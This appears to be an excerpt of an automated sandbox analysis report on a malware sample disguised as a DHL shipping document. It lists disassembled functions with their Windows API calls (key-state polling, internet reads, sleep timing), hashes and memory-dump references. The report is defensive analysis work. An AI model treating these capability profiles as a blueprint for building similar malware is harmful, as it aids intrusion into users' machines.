                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                            • String ID:
                                                                                            • API String ID: 666041331-0
                                                                                            • Opcode ID: 473a2e50c12b673df95c8f1c91db358712c6eb6793607114dd2584a5b141517c
                                                                                            • Instruction ID: 96330b1129c866658c4c98c1f895bc833ce90d57fa5a2f2365f7c455b5b5665b
                                                                                            • Opcode Fuzzy Hash: 473a2e50c12b673df95c8f1c91db358712c6eb6793607114dd2584a5b141517c
                                                                                            • Instruction Fuzzy Hash: FC512634605615DFDB11DF58C4848A9BBF1FF4A314B0980A8E84AEB762DB31ED86CB91
                                                                                            Function 008B6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 008B6C33
                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 008B6C4A
                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008B6C73
                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0089AB79,00000000,00000000), ref: 008B6C98
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008B6CC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                            • String ID:
                                                                                            • API String ID: 3688381893-0
                                                                                            • Opcode ID: bc34d0a75cd2b592dd4a85a5bd33c01afa20ec8762045f84d5c2852db6015299
                                                                                            • Instruction ID: 9d4ea9361c48876c3f21aa04c1742d02cdea7c1b1d59bc889e3b62f2dea16832
                                                                                            • Opcode Fuzzy Hash: bc34d0a75cd2b592dd4a85a5bd33c01afa20ec8762045f84d5c2852db6015299
                                                                                            • Instruction Fuzzy Hash: C641A235A04108AFDB24CF28CC68FE97FA5FB09360F140268E995E73A0E375AD61CA50
                                                                                            Function 00852051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 11557e36bafb9c7db61791e87387cb8ec1e31a0ec38ad1e9cc5ab3a172d228f0
                                                                                            • Instruction ID: 30f3dfafd188ba289d1245c0d72946a47ea55e218dffabf03321b8cd3100445a
                                                                                            • Opcode Fuzzy Hash: 11557e36bafb9c7db61791e87387cb8ec1e31a0ec38ad1e9cc5ab3a172d228f0
                                                                                            • Instruction Fuzzy Hash: 5B41D132E006049FCB24DF78C981A5EB7A5FF8A315F1545A8EA15EB392DB31AD05CB81
                                                                                            Function 0083912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 00839141
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 0083915E
                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00839183
                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 0083919D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                            • String ID:
                                                                                            • API String ID: 4210589936-0
                                                                                            • Opcode ID: cf087b5d10f8414c314743925f62db225b70b42662a32622ffd6a283d8705db6
                                                                                            • Instruction ID: 3b20dd26bf348f8a1b39b0f64fc933238eeaf21dc279ded487b7e22565ca0b29
                                                                                            • Opcode Fuzzy Hash: cf087b5d10f8414c314743925f62db225b70b42662a32622ffd6a283d8705db6
                                                                                            • Instruction Fuzzy Hash: 5C416F31A0860AFBDF159F68C844BEEB774FB45324F208229E469E3294C774A950CFA1
                                                                                            Function 00893874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetInputState.USER32 ref: 008938CB
                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00893922
                                                                                            • TranslateMessage.USER32(?), ref: 0089394B
                                                                                            • DispatchMessageW.USER32(?), ref: 00893955
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00893966
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                            • String ID:
                                                                                            • API String ID: 2256411358-0
                                                                                            • Opcode ID: d1e6fec1705dd191bb508543173caeb0e81758fa5b0774a51d4ccec6b10dcda5
                                                                                            • Instruction ID: 879032ed9b21ec134d810e24297fff0de603682d75e5ca583f297f23fac7d469
                                                                                            • Opcode Fuzzy Hash: d1e6fec1705dd191bb508543173caeb0e81758fa5b0774a51d4ccec6b10dcda5
                                                                                            • Instruction Fuzzy Hash: 3A31DF70904346DEEF35EB359808FB67FA8FB16304F0C0569E466D25A0E3B4AA85CB21
                                                                                            Function 0089CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CF38
                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 0089CF6F
                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFB4
                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFC8
                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,0089C21E,00000000), ref: 0089CFF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                            • String ID:
                                                                                            • API String ID: 3191363074-0
                                                                                            • Opcode ID: ca4551f5eb7ab401fb46da357c7fbf2153569549f69562205863acb368d49bbc
                                                                                            • Instruction ID: 1b203483d415b8898bc978f1dcfc54f04ed5bfd19af9bbe6e4e319685998011d
                                                                                            • Opcode Fuzzy Hash: ca4551f5eb7ab401fb46da357c7fbf2153569549f69562205863acb368d49bbc
                                                                                            • Instruction Fuzzy Hash: 7A315E71900609EFDF20EFA9C8849ABBBF9FF54354B14442EF506D2141DB71AE40DBA0
                                                                                            Function 00881901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowRect.USER32(?,?), ref: 00881915
                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 008819C1
                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 008819C9
                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 008819DA
                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008819E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3382505437-0
                                                                                            • Opcode ID: a3ffc4659fa722e15322113bbca8073d29c20e037b001088b4e3656e87fc61ca
                                                                                            • Instruction ID: 3d15048e061d90103fa53febdb88d8b77f3b1c0c4b182f1cd849ea28f0cbabc5
                                                                                            • Opcode Fuzzy Hash: a3ffc4659fa722e15322113bbca8073d29c20e037b001088b4e3656e87fc61ca
                                                                                            • Instruction Fuzzy Hash: 44319C71A00219EFCB00DFA8CD9DAAE3BB9FB05315F104229F961E72D1CBB09945CB90
                                                                                            Function 008B5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 008B5745
                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 008B579D
                                                                                            • _wcslen.LIBCMT ref: 008B57AF
                                                                                            • _wcslen.LIBCMT ref: 008B57BA
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008B5816
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$_wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 763830540-0
                                                                                            • Opcode ID: 6fb2071cee7a7a99386e6b862d88ffdcb9b398a1dfc0e1860fa7eb6b08b8aa7c
                                                                                            • Instruction ID: 7bf8912399bd7df3bd2bd82030e4f658bfba7d2f47ca06f55f09be7c01a37462
                                                                                            • Opcode Fuzzy Hash: 6fb2071cee7a7a99386e6b862d88ffdcb9b398a1dfc0e1860fa7eb6b08b8aa7c
                                                                                            • Instruction Fuzzy Hash: 4A218271904618EADB209FA4DC85BEE7BB8FF14724F108216F929EB2C0D7709985CF54
                                                                                            Function 0083990F Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000008), ref: 008398CC
                                                                                            • SetTextColor.GDI32(?,?), ref: 008398D6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 008398E9
                                                                                            • GetStockObject.GDI32(00000005), ref: 008398F1
                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00839952
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$LongModeObjectStockTextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1860813098-0
                                                                                            • Opcode ID: 803251941eca461a9ea5a9bcd9e6d2db499c38c74217f2162120613d3ad88da0
                                                                                            • Instruction ID: 766b5e580df8492cb945f4c6f7a34f0b8c1c94bb73f94cda91594386c656db22
                                                                                            • Opcode Fuzzy Hash: 803251941eca461a9ea5a9bcd9e6d2db499c38c74217f2162120613d3ad88da0
                                                                                            • Instruction Fuzzy Hash: C33126325492909FC7128F38EC54AA53FA0FF97331B18029DE9D2CA1B1C7724952DB90
                                                                                            Function 008A0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindow.USER32(00000000), ref: 008A0951
                                                                                            • GetForegroundWindow.USER32 ref: 008A0968
                                                                                            • GetDC.USER32(00000000), ref: 008A09A4
                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 008A09B0
                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 008A09E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                            • String ID:
                                                                                            • API String ID: 4156661090-0
                                                                                            • Opcode ID: 936286eb0ce197282f63c4696be81326685f778e08059a49b592ff7cb5ce0fb3
                                                                                            • Instruction ID: 0fd7e2253a1cc7e93a698c973f1f442cb38ece964e91b618ebe91014356730cf
                                                                                            • Opcode Fuzzy Hash: 936286eb0ce197282f63c4696be81326685f778e08059a49b592ff7cb5ce0fb3
                                                                                            • Instruction Fuzzy Hash: 39218135A00214AFDB04EF69D989AAEBBE9FF49700F04816CF84AD7752CB70AC44CB51
                                                                                            Function 0085CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0085CDC6
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0085CDE9
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0085CE0F
                                                                                            • _free.LIBCMT ref: 0085CE22
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0085CE31
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                            • String ID:
                                                                                            • API String ID: 336800556-0
                                                                                            • Opcode ID: 0986a84061d46e9840685d8c934ad018370f8d3da2f641c1f7163e1c8b386e6b
                                                                                            • Instruction ID: df70a40b2259317737924fc7fc79c24567688bb68dbe3b96d6a10bb10900b213
                                                                                            • Opcode Fuzzy Hash: 0986a84061d46e9840685d8c934ad018370f8d3da2f641c1f7163e1c8b386e6b
                                                                                            • Instruction Fuzzy Hash: C6018F726023157F27211ABAAC8AD7B7E6DFEC6BA23150229FD05D7201EB618D0589B1
                                                                                            Function 00839639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                            • BeginPath.GDI32(?), ref: 008396B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                            • String ID:
                                                                                            • API String ID: 3225163088-0
                                                                                            • Opcode ID: 7f480d73f955e7f8920197fdfbb96b1b418c2701304990c27b6cd1beec10e8eb
                                                                                            • Instruction ID: dfa282de2b8a6d481c05145f99243ca51ffa1652a24858d3705a2ef21b626a79
                                                                                            • Opcode Fuzzy Hash: 7f480d73f955e7f8920197fdfbb96b1b418c2701304990c27b6cd1beec10e8eb
                                                                                            • Instruction Fuzzy Hash: 6B216D30902205EBDF119F29DC19BB93FA8FBA0315F504216F450E61A0E3F09892CFD0
                                                                                            Function 00885711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 2931989736-0
                                                                                            • Opcode ID: 650b19fb6b37e6bbcd160c4f4bc4589da55db442ac2cd27f854bc9c4afa49927
                                                                                            • Instruction ID: ae0a61a46456851af9c992ef25986c67b631d6dbddc40fc62ebcc6ce1e1af087
                                                                                            • Opcode Fuzzy Hash: 650b19fb6b37e6bbcd160c4f4bc4589da55db442ac2cd27f854bc9c4afa49927
                                                                                            • Instruction Fuzzy Hash: 2501927564161EBAE60875149D82EFB635CFB213A8F40C020FE14DA342F768ED5083A5
                                                                                            Function 00852DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,?,0084F2DE,00853863,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6), ref: 00852DFD
                                                                                            • _free.LIBCMT ref: 00852E32
                                                                                            • _free.LIBCMT ref: 00852E59
                                                                                            • SetLastError.KERNEL32(00000000,00821129), ref: 00852E66
                                                                                            • SetLastError.KERNEL32(00000000,00821129), ref: 00852E6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free
                                                                                            • String ID:
                                                                                            • API String ID: 3170660625-0
                                                                                            • Opcode ID: 233bbe981ab3dd708f3cb0ad884b9d3442b27f39dca51916671bf57fe70b864e
                                                                                            • Instruction ID: 792b99a0e36df28d18a622b11dc2dc5a9f147a008126897c4054804f9145e736
                                                                                            • Opcode Fuzzy Hash: 233bbe981ab3dd708f3cb0ad884b9d3442b27f39dca51916671bf57fe70b864e
                                                                                            • Instruction Fuzzy Hash: AC01F432645A006BC71267786C87D2B2B99FBD73BBB644129FC21E2293EF349C0D4122
                                                                                            Function 0088000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?,?,0088035E), ref: 0088002B
                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880046
                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880054
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?), ref: 00880064
                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0087FF41,80070057,?,?), ref: 00880070
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 3897988419-0
                                                                                            • Opcode ID: 9738b11108540665fcf630e27257e5b92508977d6058f45041f80eb65dad2fb9
                                                                                            • Instruction ID: 70ddca12f2b1ae9d06bf698d22c8f9cf9b2dc78336e8a618285edf5f84df9d56
                                                                                            • Opcode Fuzzy Hash: 9738b11108540665fcf630e27257e5b92508977d6058f45041f80eb65dad2fb9
                                                                                            • Instruction Fuzzy Hash: 6C01AD72600605BFDB51AF68DC04BAA7BEDFF48792F144224F905D6210E771DD449BA0
                                                                                            Function 0088E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0088E997
                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0088E9A5
                                                                                            • Sleep.KERNEL32(00000000), ref: 0088E9AD
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0088E9B7
                                                                                            • Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
